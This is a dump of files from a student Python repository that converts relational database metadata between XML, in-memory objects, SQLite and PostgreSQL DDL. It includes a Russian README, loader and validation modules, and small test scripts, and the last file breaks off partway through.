"text": "from __future__ import unicode_literals\n\nCURRENT_DBD_VERSION = '3.1'\n\nSQL_DBD_PRE_INIT = \"\"\"\\\n CREATE TEMPORARY TABLE schemas (\n name VARCHAR UNIQUE NOT NULL\n ,fulltext_engine VARCHAR NULL\n ,version VARCHAR NULL\n ,description VARCHAR NULL\n );\n\"\"\"\n\nSQL_DBD_DOMAINS_TABLE_INIT = \"\"\"\n CREATE TEMPORARY TABLE domains (\n name VARCHAR UNIQUE DEFAULT(NULL) NULL\n ,description VARCHAR DEFAULT(NULL) NULL\n ,data_type_name VARCHAR NOT NULL \n ,length INTEGER DEFAULT(NULL) NULL\n ,char_length INTEGER DEFAULT(NULL) NULL\n ,precision INTEGER DEFAULT(NULL) NULL\n ,scale INTEGER DEFAULT(NULL) NULL\n ,width INTEGER DEFAULT(NULL) NULL\n ,align CHAR DEFAULT(NULL) NULL\n ,show_null BOOLEAN DEFAULT(NULL) NULL\n ,show_lead_nulls BOOLEAN DEFAULT(NULL) NULL\n ,thousands_separator BOOLEAN DEFAULT(NULL) NULL\n ,summable BOOLEAN DEFAULT(NULL) NULL\n ,case_sensitive BOOLEAN DEFAULT(NULL) NULL\n ,uuid VARCHAR UNIQUE NOT NULL\n );\n\"\"\"\n\nSQL_DBD_TABLES_TABLE_INIT = \"\"\"\n CREATE TEMPORARY TABLE tables (\n schema_name VARCHAR NOT NULL \n ,name VARCHAR UNIQUE NOT NULL \n ,description VARCHAR DEFAULT(NULL) NULL \n ,can_add BOOLEAN DEFAULT(NULL) NULL \n ,can_edit BOOLEAN DEFAULT(NULL) NULL \n ,can_delete BOOLEAN DEFAULT(NULL) NULL \n ,temporal_mode VARCHAR DEFAULT(NULL) NULL \n ,means VARCHAR DEFAULT(NULL) NULL \n ,uuid VARCHAR UNIQUE NOT NULL\n );\n\"\"\"\n\nSQL_DBD_TABLES_INIT = \"\"\"\n CREATE TEMPORARY TABLE fields (\n table_name VARCHAR NOT NULL \n ,position INTEGER NOT NULL \n ,name VARCHAR NOT NULL \n ,russian_short_name VARCHAR NOT NULL \n ,description VARCHAR DEFAULT(NULL) NULL \n ,domain_name VARCHAR NOT NULL \n ,can_input BOOLEAN DEFAULT(NULL) NULL \n ,can_edit BOOLEAN DEFAULT(NULL) NULL \n ,show_in_grid BOOLEAN DEFAULT(NULL) NULL \n ,show_in_details BOOLEAN DEFAULT(NULL) NULL\n ,is_mean BOOLEAN DEFAULT(NULL) NULL \n ,autocalculated BOOLEAN DEFAULT(NULL) NULL \n ,required BOOLEAN DEFAULT(NULL) NULL \n ,uuid VARCHAR UNIQUE NOT NULL\n );\n\n CREATE TEMPORARY TABLE constraints (\n id INTEGER NOT NULL -- Синтетический временный идентификатор.\n ,table_name VARCHAR NOT NULL \n ,name VARCHAR DEFAULT(NULL) NULL \n ,constraint_type CHAR DEFAULT(NULL) NULL \n ,reference VARCHAR DEFAULT(NULL) NULL \n ,unique_key_name VARCHAR DEFAULT(NULL) NULL \n ,has_value_edit BOOLEAN DEFAULT(NULL) NULL \n ,cascading_delete BOOLEAN DEFAULT(NULL) NULL \n ,expression VARCHAR DEFAULT(NULL) NULL\n ,uuid VARCHAR UNIQUE NOT NULL\n );\n\n CREATE TEMPORARY TABLE constraint_details (\n constraint_id INTEGER NOT NULL \n ,position INTEGER NOT NULL \n ,field_name VARCHAR NOT NULL\n );\n\n CREATE TEMPORARY TABLE indices (\n id INTEGER NOT NULL -- Синтетический временный идентификатор.\n ,table_name VARCHAR NOT NULL \n ,name VARCHAR DEFAULT(NULL) NULL \n ,local BOOLEAN DEFAULT(0) NOT NULL \n ,kind CHAR DEFAULT(NULL) NULL \n ,uuid VARCHAR UNIQUE NOT NULL\n );\n\n CREATE TEMPORARY TABLE index_details (\n index_id INTEGER NOT NULL \n ,position INTEGER NOT NULL \n ,field_name VARCHAR DEFAULT(NULL) NULL \n ,expression VARCHAR DEFAULT(NULL) NULL \n ,descend BOOLEAN DEFAULT(NULL) NULL \n );\n\"\"\"\n\nSQL_TMP_INIT = SQL_DBD_PRE_INIT + SQL_DBD_DOMAINS_TABLE_INIT + \\\n SQL_DBD_TABLES_TABLE_INIT + SQL_DBD_TABLES_INIT\n"
},
{
"alpha_fraction": 0.8266666531562805,
"alphanum_fraction": 0.8266666531562805,
"avg_line_length": 29,
"blob_id": "9cb87d935d77699f5dcf68fb3d579b92b4d72f88",
"content_id": "23c6513ef34032332f3c5984de450b160a4d3b91",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 150,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 5,
"path": "/_test/test_replication.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "from db_replication.replication import Replicator\n\nreplicator = Replicator('Northwind')\nreplicator.create_empty_database()\nreplicator.transfer_data()\n"
},
{
"alpha_fraction": 0.7284768223762512,
"alphanum_fraction": 0.743929386138916,
"avg_line_length": 25.647058486938477,
"blob_id": "32c8d314a5edd55f774d7e30d3c048a6cc85dab3",
"content_id": "f30e81abf86e1413a1a49472d68f934b037fc676",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 577,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 17,
"path": "/create_xml_for_db.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "import sys\n\nimport dbd_repr.dbd_to_ram as dbd2ram\nimport ram_repr.ram_to_xml as ram2xml\n\nif len(sys.argv) != 2:\n raise KeyError('Ожидается 1 параметр: путь для создания XML представления.')\n\nxml = sys.argv[0]\n\nprint('Создание выгрузка метаданных и БД...')\nschemas = dbd2ram.load(queries='dbd_queries_sqlite.cfg', db_config='database.cfg')\n\nprint('Создание XML представления метаданных...')\nram2xml.write(schemas, xml)\n\nprint('Выполнение завершено.')\n"
},
{
"alpha_fraction": 0.8209649920463562,
"alphanum_fraction": 0.8236590623855591,
"avg_line_length": 101.0999984741211,
"blob_id": "ec2293f351e31d4a3b2b848bb216d55c8b6a59e2",
"content_id": "5029ef656177244eb248c817b886ddf56b88e9fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7094,
"license_type": "no_license",
"max_line_length": 173,
"num_lines": 40,
"path": "/README.md",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "# collective-development\nRepository contains implementations of cours tasks by Daniil Lukinov.\nЧто реализовано:\n1. Реализовано преобразование текстового представления базы в представление в RAM:\n * реализованы классы, моделирующие элементы базы (модуль ram_structure)\n * реализован модуль, позволяющий произвести разбор текстового представления в объектное (модуль xml_to_ra,)\n * реализованы методы валидации (проверки корректности данных) элементов объектного представления (модуль ram_validation)\n * реализован каскадный проброс ошибок, позволяющий получить больше информации о местоположении неверно заданных элементов\n * реализованы преобразование и загрузка структурированных индексов и ограничений по средствам создания деталей\n2. Реализовано преобразование объектного представления базы в текстовое:\n * реализован модуль, позволяющий произвести данное преобразование (модуль ram_to_xml)\n3. Реализован модуль для тестового запуска реализованных процедур (XML-RAM), который:\n * выполняет преобразование двух предоставленных тестовых файлом в объектное представление в RAM (модуль test_xml_ram)\n * полученные модели преобразует обратно в текстовое представление XML (модуль test_xml_ram)\n * производит построчную сверку файлов с точностью до межстрочных разделителей и делает заключение об идентичности (модуль test_xml_ram)\n4. Реализван модуль выгрузки RAM-представления в базу SQLite. Таким образом создается DBD-представление схемы (модуль ram_to_dbd)\n * Модуль содержит метод upload, который в качестве параметров получает путь к создаваемому файлу базы данных и список выгружаемых схем.\n * В первую очередь создаются источники в БД для временного и постоянного хранения структурных элементов.\n * Выгрузка производится во временные источники для того, чтобы избежать большого количества обращений к БД по ключу.\n * Производится выгрузка всех данных из переданных объектов во временные источники. Запросы для выгрузки находятся в файле \"dbd_queries.cfg\".\n * Запускается скрипт, переливающий данные из временных источников в постоянные, проставляя все связи.\n5. Реализован модуль загрузки DBD-представления и преобразования в RAM-представление.\n * С использованием скриптов, находящихся в файле \"dbd_queries.cfg\", производится загрузка словарей из базы SQLite.\n * Полученные словари преобразуются в последовательность объектов RAM-представления.\n * Исходя из загруженных из БД идентификаторов проставляются связи между объектами в RAM.\n6. Реализован модуль для тестового запуска реализованных процедур (RAM-DBD), который:\n * Преобразует содержимое файла с XML-представлением в RAM-представление.\n * Полученное представление в ОП преобразует в реляционное (dbd).\n * Выполняет обратный процесс: из реляционного представления преобразует данные в RAM-представление, затем в XML.\n * В конечном итогу производится построчное сравнение результата выгрузки с исходным файлом.\n7. Реализован класс, генерирующий DLL-инструкции. (модуль ddl_genearator)\n * На вход методы класса получают объекты элементов метаданных в объектном представлении.\n * Методы класса производят формирование DLL-инструкций для создания элементов в БД PostgreSQL.\n * На выходе методов - готова DLL-инструкция, готовая к выполнению.\n8. Реализован класс, представляющий собой подключение к серверу Postgres, способный генерировать пустую БД по реляционному или текстовому представлению. (модуль dll_aplying)\n * При инициализации классу передается путь к config-файлу с параметрами подключения.\n * Соответствующие методы класса производят генерацию элемента в БД, получая на вход объект в объектном представлении.\n * Метод deploy, получающий на вход имя генерируемой БД и путь к файлу с одним из заданных представлений метаданных, создает и генерирует структуру, исходя из метаданных.\n9. Начата реализация unit-теста для проверки класса DllGenerator, но разработка прекращена в связи с проблемамы сравнения многострочных переменных.\n10. Реализован мини-модуль (test_ddl_applying), производящий запуск генерации пустой БД из двух представлений: реляционного и текстового. Базы успешно формируются."
},
{
"alpha_fraction": 0.5905345678329468,
"alphanum_fraction": 0.5909300446510315,
"avg_line_length": 30.345041275024414,
"blob_id": "8fa00d4ca314b9005a744638570b8f75bc52b45f",
"content_id": "5d0d7646811ba04086ee530a3e8476c2d1434551",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16578,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 484,
"path": "/dbd_repr/dbd_to_ram.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "import configparser\nimport pyodbc\nimport sqlite3\n\nfrom ram_repr.ram_structure import Constraint\nfrom ram_repr.ram_structure import ConstraintDetail\nfrom ram_repr.ram_structure import Domain\nfrom ram_repr.ram_structure import Field\nfrom ram_repr.ram_structure import Index\nfrom ram_repr.ram_structure import IndexDetail\nfrom ram_repr.ram_structure import Schema\nfrom ram_repr.ram_structure import Table\n\n\nclass DbdDownloadConnection:\n \"\"\" Класс, реализующий подключеине к базе для загрузки данных из источников структурных\n элементов в виде словарей.\n \"\"\"\n def __init__(self, queries_config: str, db_file=None, db_config=None):\n self.queries = configparser.ConfigParser()\n self.queries.read(queries_config, 'utf-8')\n if db_file:\n self.conn = sqlite3.connect(db_file)\n elif db_config:\n config = configparser.ConfigParser()\n config.read(db_config, 'utf-8')\n server = config.get('SERVER', 'mssql_server')\n self.conn = pyodbc.connect(server)\n else:\n raise KeyError('Необходимо задать хотя бы одно из: файл БД; файл с параментрами БД.')\n self.cursor = self.conn.cursor()\n\n def __exit__(self):\n self.conn.close()\n\n def _get_result(self):\n \"\"\" Получить результат последнего выполненного запроса в виде словаря.\n\n :return: dict\n \"\"\"\n columns = [column[0] for column in self.cursor.description]\n results = []\n for row in self.cursor.fetchall():\n results.append(dict(zip(columns, row)))\n return results\n\n def load_schemas(self):\n \"\"\" Загрузить словари схем.\n\n :return: dict\n \"\"\"\n query = self.queries.get('DOWNLOADING', 'schema')\n self.cursor.execute(query)\n return self._get_result()\n\n def load_domains(self):\n \"\"\" Загрузить словари доменов.\n\n :return: dict\n \"\"\"\n query = self.queries.get('DOWNLOADING', 'domain')\n self.cursor.execute(query)\n return self._get_result()\n\n def load_tables(self):\n \"\"\" Загрузить словари таблиц.\n\n :return: dict\n \"\"\"\n query = self.queries.get('DOWNLOADING', 'table')\n self.cursor.execute(query)\n return self._get_result()\n\n def load_fields(self):\n query = self.queries.get('DOWNLOADING', 'field')\n self.cursor.execute(query)\n return self._get_result()\n\n def load_constraints(self):\n \"\"\" Загрузить словари ограничений.\n\n :return: dict\n \"\"\"\n query = self.queries.get('DOWNLOADING', 'constraint')\n self.cursor.execute(query)\n return self._get_result()\n\n def load_index(self):\n \"\"\" Загрузить словари индексов.\n\n :return: dict\n \"\"\"\n query = self.queries.get('DOWNLOADING', 'index')\n self.cursor.execute(query)\n return self._get_result()\n\n def load_constraint_details(self):\n \"\"\" Загрузить словари деталей ограничений.\n\n :return: dict\n \"\"\"\n query = self.queries.get('DOWNLOADING', 'constraint_detail')\n self.cursor.execute(query)\n return self._get_result()\n\n def load_index_details(self):\n \"\"\" Загрузить словари деталей индексов.\n\n :return: dict\n \"\"\"\n query = self.queries.get('DOWNLOADING', 'index_detail')\n self.cursor.execute(query)\n return self._get_result()\n\n\ndef load(queries: str, db_file: str=None, db_config: str=None):\n \"\"\" Создать RAM-представление схемы базы посредствам загрузки струтурных компонентов из базы,\n получаемой из файла, путь к которому передается в качестве параметра.\n\n :param queries: путь к файлу с параметрами подключения и запросами.\n :param db_file: путь к файлу базы данных\n :return: listW\n \"\"\"\n conn = DbdDownloadConnection(queries, db_file, db_config)\n\n schemas = {}\n for schema_row in conn.load_schemas():\n schema, schema_id = _create_schema(schema_row)\n schemas[schema_id] = schema\n\n tables = {}\n for table_row in conn.load_tables():\n table, table_id, schema_id = _create_table(table_row)\n tables[table_id] = table\n schemas[schema_id].tables[table.name] = table\n\n domains = {}\n for domain_row in conn.load_domains():\n domain, domain_id = _create_domain(domain_row)\n domains[domain_id] = domain\n for schema in [schema for schema in schemas.values() if len(schema.tables) > 0]:\n schema.domains[domain.name] = domain\n\n fields = {}\n for field_row in conn.load_fields():\n field, field_id, table_id = _create_field(field_row)\n if table_id not in tables:\n continue\n tables[table_id].fields[field.name] = field\n fields[field_id] = field\n\n constraints = {}\n for constraint_row in conn.load_constraints():\n constraint, constraint_id, table_id = _create_constraint(constraint_row)\n if table_id not in tables:\n continue\n tables[table_id].constraints.append(constraint)\n constraints[constraint_id] = constraint\n\n indices = {}\n for index_row in conn.load_index():\n index, index_id, table_id = _create_index(index_row)\n if table_id not in tables:\n continue\n tables[table_id].indexes.append(index)\n indices[index_id] = index\n\n constraint_details = {}\n for detail_row in conn.load_constraint_details():\n detail, detail_id, constraint_id = _create_constraint_detail(detail_row)\n constraints[constraint_id].details.append(detail)\n constraint_details[detail_id] = detail\n\n index_details = {}\n for detail_row in conn.load_index_details():\n detail, detail_id, index_id = _create_index_detail(detail_row)\n if index_id not in indices:\n continue\n indices[index_id].details.append(detail)\n index_details[detail_id] = detail\n\n return schemas.values()\n\n\ndef _create_schema(attr_dict):\n \"\"\" Создать объект Схемы, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dbd-представления.\n :return: объект Схемы.\n \"\"\"\n schema = Schema()\n\n schema_id = None\n\n for attr in attr_dict:\n if attr == 'name':\n schema.name = attr_dict[attr]\n elif attr == 'fulltext_engine':\n schema.fulltext_engine = attr_dict[attr]\n elif attr == 'version':\n schema.version = attr_dict[attr]\n elif attr == 'description':\n schema.description = attr_dict[attr]\n elif attr == 'id':\n schema_id = attr_dict[attr]\n else:\n raise UnsupportedAttributeError(attr)\n return schema, schema_id\n\n\ndef _create_domain(attr_dict):\n \"\"\" Создать объект Домена, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dbd-представления.\n :return: объект Домена.\n \"\"\"\n domain = Domain()\n\n domain_id = None\n\n for attr in attr_dict:\n if attr == 'name':\n domain.name = attr_dict[attr]\n elif attr == 'data_type_name':\n domain.type = attr_dict[attr]\n elif attr == 'align':\n domain.align = attr_dict[attr]\n elif attr == 'width':\n domain.width = attr_dict[attr]\n elif attr == 'char_length':\n domain.char_length = attr_dict[attr]\n elif attr == 'description':\n domain.description = attr_dict[attr]\n elif attr == 'length':\n domain.length = attr_dict[attr]\n elif attr == 'scale':\n domain.scale = attr_dict[attr]\n elif attr == 'precision':\n domain.precision = attr_dict[attr]\n elif attr == 'case_sensitive':\n domain.case_sensitive = attr_dict[attr]\n elif attr == 'show_null':\n domain.show_null = attr_dict[attr]\n elif attr == 'show_lead_nulls':\n domain.show_lead_nulls = attr_dict[attr]\n elif attr == 'thousands_separator':\n domain.thousands_separator = attr_dict[attr]\n elif attr == 'summable':\n domain.summable = attr_dict[attr]\n elif attr == 'id':\n domain_id = attr_dict[attr]\n else:\n raise UnsupportedAttributeError(attr)\n return domain, domain_id\n\n\ndef _create_table(attr_dict):\n \"\"\" Создать объект Таблицы, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dbd-представления.\n :return: объект Таблицы.\n \"\"\"\n table = Table()\n\n table_id = None\n schema_id = None\n\n for attr in attr_dict:\n if attr == 'name':\n table.name = attr_dict[attr]\n elif attr == 'description':\n table.description = attr_dict[attr]\n elif attr == 'temporal_mode':\n table.ht_table_flags = attr_dict[attr]\n elif attr == 'access_level':\n table.access_level = attr_dict[attr]\n elif attr == 'can_add':\n table.add = attr_dict[attr]\n elif attr == 'can_edit':\n table.edit = attr_dict[attr]\n elif attr == 'can_delete':\n table.delete = attr_dict[attr]\n elif attr == 'means':\n table.means = attr_dict[attr]\n elif attr == 'schema_id':\n schema_id = attr_dict[attr]\n elif attr == 'id':\n table_id = attr_dict[attr]\n else:\n raise UnsupportedAttributeError(attr)\n return table, table_id, schema_id\n\n\ndef _create_field(attr_dict):\n \"\"\" Создать объект Поля, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dbd-представления.\n :return: объект Поля.\n \"\"\"\n field = Field()\n\n field_id = None\n table_id = None\n\n for attr in attr_dict:\n if attr == 'name':\n field.name = attr_dict[attr]\n elif attr == 'russian_short_name':\n field.rname = attr_dict[attr]\n elif attr == 'domain_name':\n field.domain = attr_dict[attr]\n elif attr == 'type':\n field.type = attr_dict[attr]\n elif attr == 'description':\n field.description = attr_dict[attr]\n elif attr == 'can_input':\n field.input = attr_dict[attr]\n elif attr == 'can_edit':\n field.edit = attr_dict[attr]\n elif attr == 'show_in_grid':\n field.show_in_grid = attr_dict[attr]\n elif attr == 'show_in_details':\n field.show_in_details = attr_dict[attr]\n elif attr == 'is_mean':\n field.is_mean = attr_dict[attr]\n elif attr == 'autocalculated':\n field.autocalculated = attr_dict[attr]\n elif attr == 'required':\n field.required = attr_dict[attr]\n elif attr == 'id':\n field_id = attr_dict[attr]\n elif attr == 'table_id':\n table_id = attr_dict[attr]\n else:\n raise UnsupportedAttributeError(attr)\n return field, field_id, table_id\n\n\ndef _create_constraint(attr_dict):\n \"\"\" Создать объект Ограничения, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dbd-представления.\n :return: объект Ограничения.\n \"\"\"\n constraint = Constraint()\n\n if attr_dict is None:\n return constraint\n\n constraint_id = None\n table_id = None\n\n for attr in attr_dict:\n if attr == 'name':\n constraint.name = attr_dict[attr]\n elif attr == 'constraint_type':\n constraint.kind = attr_dict[attr]\n elif attr == 'items':\n detail = ConstraintDetail()\n detail.value = attr_dict[attr]\n constraint.details.append(detail)\n elif attr == 'reference':\n constraint.reference = attr_dict[attr]\n elif attr == 'unique_key_id':\n constraint.constraint = attr_dict[attr]\n elif attr == 'expression':\n constraint.expression = attr_dict[attr]\n elif attr == 'has_value_edit':\n constraint.has_value_edit = attr_dict[attr]\n elif attr == 'cascading_delete':\n constraint.cascading_delete = attr_dict[attr]\n elif attr == 'id':\n constraint_id = attr_dict[attr]\n elif attr == 'table_id':\n table_id = attr_dict[attr]\n else:\n raise UnsupportedAttributeError(attr)\n return constraint, constraint_id, table_id\n\n\ndef _create_index(attr_dict):\n \"\"\" Создать объект Индекса, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dbd-представления.\n :return: объект Индекса.\n \"\"\"\n index = Index()\n\n if attr_dict is None:\n return index\n\n index_id = None\n table_id = None\n\n for attr in attr_dict:\n if attr == 'name':\n index.name = attr_dict[attr]\n elif attr == 'field':\n detail = IndexDetail()\n detail.value = attr_dict[attr]\n index.details.append(detail)\n elif attr == 'kind':\n index.kind = attr_dict[attr]\n elif attr == 'local':\n index.local = attr_dict[attr]\n elif attr == 'uniqueness':\n index.uniqueness = attr_dict[attr]\n elif attr == 'fulltext':\n index.fulltext = attr_dict[attr]\n elif attr == 'id':\n index_id = attr_dict[attr]\n elif attr == 'table_id':\n table_id = attr_dict[attr]\n else:\n raise UnsupportedAttributeError(attr)\n return index, index_id, table_id\n\n\ndef _create_constraint_detail(attr_dict):\n \"\"\" Создать объект Детали ограничения, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dbd-представления.\n :return: объект Детали ограничения.\n \"\"\"\n detail = ConstraintDetail()\n\n detail_id = None\n constraint_id = None\n\n for attr in attr_dict:\n if attr == 'field_name':\n detail.value = attr_dict[attr]\n elif attr == 'id':\n detail_id = attr_dict[attr]\n elif attr == 'constraint_id':\n constraint_id = attr_dict[attr]\n else:\n raise UnsupportedAttributeError(attr)\n return detail, detail_id, constraint_id\n\n\ndef _create_index_detail(attr_dict):\n \"\"\" Создать объект Детали индекса, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dbd-представления.\n :return: объект Детали индекса.\n \"\"\"\n detail = IndexDetail()\n\n detail_id = None\n index_id = None\n\n for attr in attr_dict:\n if attr == 'field_name':\n detail.value = attr_dict[attr]\n elif attr == 'expression':\n detail.expression = attr_dict[attr]\n elif attr == 'descend':\n detail.descend = attr_dict[attr]\n elif attr == 'id':\n detail_id = attr_dict[attr]\n elif attr == 'index_id':\n index_id = attr_dict[attr]\n else:\n raise UnsupportedAttributeError(attr)\n return detail, detail_id, index_id\n\n\nclass ParseError(Exception):\n \"\"\" Подкласс исключений, порождаемых в процессе парсинга DBD-представления\n схемы БД.\n \"\"\"\n pass\n\n\nclass UnsupportedAttributeError(ParseError):\n \"\"\" Подкласс исключений, порождаемых при обнаружении неподдерживаемого\n атрибута в DBD-представлении БД.\n \"\"\"\n def __init__(self, attribute):\n self.attribute = attribute\n\n def __str__(self):\n return 'Неподдерживаемый атрибут \\\"' + self.attribute + '\\\"'\n"
},
{
"alpha_fraction": 0.7053364515304565,
"alphanum_fraction": 0.7238979339599609,
"avg_line_length": 22.94444465637207,
"blob_id": "9374326cc395ca194e8ea428ef5f067d9c5fe295",
"content_id": "5478838b4fbcbb89bbb15723fd51cda37974c1be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 536,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 18,
"path": "/convert_dbd_to_xml.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "import sys\n\nimport dbd_repr.dbd_to_ram as dbd2ram\nimport ram_repr.ram_to_xml as ram2xml\n\nif len(sys.argv) != 2:\n raise KeyError('Ожидается 2 параметра: путь к файлу с DBD; путь для создания XML.')\n\ndbd = sys.argv[0]\nxml = sys.argv[1]\n\nprint('Создания RAM представления...')\nschemas = dbd2ram.load('dbd_queries_sqlite.cfg', dbd)\n\nprint('Создание XML представления...')\nram2xml.write(schemas, xml)\n\nprint('Выполнение завершено.')\n"
},
{
"alpha_fraction": 0.6073479056358337,
"alphanum_fraction": 0.6153846383094788,
"avg_line_length": 30.10714340209961,
"blob_id": "e200148e8723c072fc781e70feb86e9383efa95a",
"content_id": "b63208aac7be01486990ee49a8cfcba7521d084a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1778,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 56,
"path": "/_test/test_dll_generator.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "import re\nimport unittest\n\nfrom db_deploy.ddl_generator import DdlGenerator\nfrom ram_repr.ram_structure import Domain\nfrom ram_repr.ram_structure import Field\nfrom ram_repr.ram_structure import Schema\nfrom ram_repr.ram_structure import Table\n\n\nclass TestDdlGenerator(unittest.TestCase):\n def setUp(self):\n self.white_space = re.compile(r\"^\\s+\", re.MULTILINE)\n\n self.generator = DdlGenerator()\n self.schema = Schema()\n self.schema.name = 'dbo'\n\n self.domain = Domain()\n self.domain.name = 'Salary'\n self.domain.type = 'string'\n self.domain.char_length = 100\n self.domain.description = 'Зарплата работников'\n\n self.table = Table()\n self.table.name = 'EMPLOYEE_SALARY'\n field1 = Field()\n field1.name = 'Name'\n field1.type = 'string'\n self.table.fields['Name'] = field1\n field2 = Field()\n field2.name = 'Salary'\n field2.domain = 'Salary'\n self.table.fields['Salary'] = field2\n\n def test_create_schema_dll(self):\n ddl = self.generator.create_schema_dll(self.schema)\n self.assertEqual(ddl.replace('\\n', ''), 'CREATE SCHEMA dbo')\n\n def test_create_domain_ddl(self):\n result = self.generator.create_domain_dll(self.domain, self.schema)\n\n ddl = '''\n CREATE DOMAIN dbo.\"Salary\"\n AS varchar(100);\n\n COMMENT ON DOMAIN dbo.\"Salary\"\n IS 'Зарплата работников';\n '''\n self.assertEqual(self.white_space.sub(\"\", ddl).replace('\\n', ''),\n self.white_space.sub(\"\", result).replace('\\n', ''))\n\n\n def test_create_table_ddl(self):\n result = self.generator.create_table_ddl(self.table, self.schema)\n print(result)\n"
},
{
"alpha_fraction": 0.6262312531471252,
"alphanum_fraction": 0.6262312531471252,
"avg_line_length": 33.95754623413086,
"blob_id": "b25695aa783e1d73e36c4a437a844d3e9774a9f1",
"content_id": "a4a34d9d98b4abfbf9119fe8eb3ea9355709ab3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8839,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 212,
"path": "/ram_repr/ram_validation.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "\"\"\" Модуль, содержащий методы проверки корректности структуры Схема, представленной\nв RAM в виде классов.\n\"\"\"\n\n\nfrom ram_repr.ram_structure import Constraint\nfrom ram_repr.ram_structure import ConstraintDetail\nfrom ram_repr.ram_structure import Domain\nfrom ram_repr.ram_structure import Field\nfrom ram_repr.ram_structure import Index\nfrom ram_repr.ram_structure import IndexDetail\nfrom ram_repr.ram_structure import Schema\nfrom ram_repr.ram_structure import Table\n\n\ndef validate_schema(schema: Schema):\n \"\"\" Проверить корректность данных схемы (произвести валидацию)\n\n :param schema: объект схемы к валидации.\n :return: None\n \"\"\"\n try:\n # Выполняется валидация объекта схемы.\n _validate_schema(schema)\n # Выполняется валидация каждой из таблиц схемы.\n for table in schema.tables.values():\n try:\n _validate_table(table)\n for field in table.fields.values():\n try:\n _validate_field(field, schema)\n except ValidationError as err:\n raise ValidationError('Поле.' + str(err))\n # Выполняется валидация каждого ограничения таблицы.\n for constraint in table.constraints:\n try:\n _validate_constraint(constraint, table, schema)\n # Выполняется валидация деталей ограничения.\n for detail in constraint.details:\n try:\n _validate_constraint_detail(detail, table)\n except ValidationError as ex:\n raise ValidationError('Деталь ограничения.' + str(ex))\n except ValidationError as ex:\n raise ValidationError('Ограничение.' + str(ex))\n # Выполняется валидация каждого индекса таблицы.\n for index in table.indexes:\n try:\n _validate_index(index, table)\n # Выполняется валидация деталей индекса.\n for detail in index.details:\n try:\n _validate_index_detail(detail, table)\n except ValidationError as ex:\n raise ValidationError('Деталь индекса.' + str(ex)) # Производится\n except ValidationError as ex: # каскадный\n raise ValidationError('Индекс. ' + str(ex)) # проброс\n except ValidationError as ex: # исключений.\n raise ValidationError('Таблица ' + str(table.name) + '. ' + str(ex))\n except ValidationError as ex:\n raise ValidationError('Схема ' + str(schema.name) + '. ' + str(ex))\n\n\ndef _validate_schema(schema: Schema):\n \"\"\" Произвести валидацию объекта схемы.\n\n :return: None\n \"\"\"\n if schema.name is None:\n raise EmptyRequiredPropertyError('name')\n\n\ndef _validate_domain(domain: Domain, schema: Schema):\n \"\"\" Произвести валидацию объекта домена базы.\n\n :return: None\n \"\"\"\n if domain.name is None:\n raise EmptyRequiredPropertyError('name')\n if domain.type is None:\n raise EmptyRequiredPropertyError('type')\n if domain.type not in schema.data_types:\n raise UnsupportedDataTypeError(domain.type)\n\n\ndef _validate_table(table: Table):\n \"\"\" Произвести валидацию объекта таблицы.\n\n :return: None\n \"\"\"\n if table.name is None:\n raise EmptyRequiredPropertyError('name')\n\n\ndef _validate_field(field: Field, schema: Schema):\n \"\"\" Произвести валидацию объекта поля базы.\n\n :return: None\n \"\"\"\n if field.name is None:\n raise EmptyRequiredPropertyError('name')\n if field.domain is None and field.type is None:\n raise EmptyRequiredPropertyError('domain, type')\n if field.type is not None and field.type not in schema.data_types:\n raise UnsupportedDataTypeError(field.type)\n if field.domain is not None and field.domain not in schema.domains:\n raise ElementReferenceError(field.domain)\n\n\ndef _validate_constraint(constraint: Constraint, table: Table, schema: Schema):\n \"\"\" Произвести валидацию объекта ограничения базы.\n\n :return: None\n \"\"\"\n if constraint.kind is None:\n raise EmptyRequiredPropertyError('kind')\n elif constraint.kind == 'PRIMARY' \\\n and any([key for key in table.constraints if key.kind == 'PRIMARY' and key != constraint]):\n raise UniqueViolationError('PRIMARY')\n elif constraint.kind != 'FOREIGN' \\\n and (constraint.reference is not None or constraint.constraint is not None):\n raise ForeignKeyError()\n elif constraint.reference is not None and constraint.reference not in schema.tables:\n raise ElementReferenceError(constraint.reference)\n\n\ndef _validate_constraint_detail(detail: ConstraintDetail, table: Table):\n \"\"\" Произвести валидацию объекта детали ограничения.\n\n :return: None\n \"\"\"\n if detail.value is None:\n raise EmptyRequiredPropertyError('value')\n elif detail.value not in table.fields:\n raise ElementReferenceError(detail.value)\n\n\ndef _validate_index(index: Index, table: Table):\n \"\"\" Произвести валидацию объекта индекса.\n\n :return: None\n \"\"\"\n pass\n\n\ndef _validate_index_detail(detail: IndexDetail, table: Table):\n \"\"\" 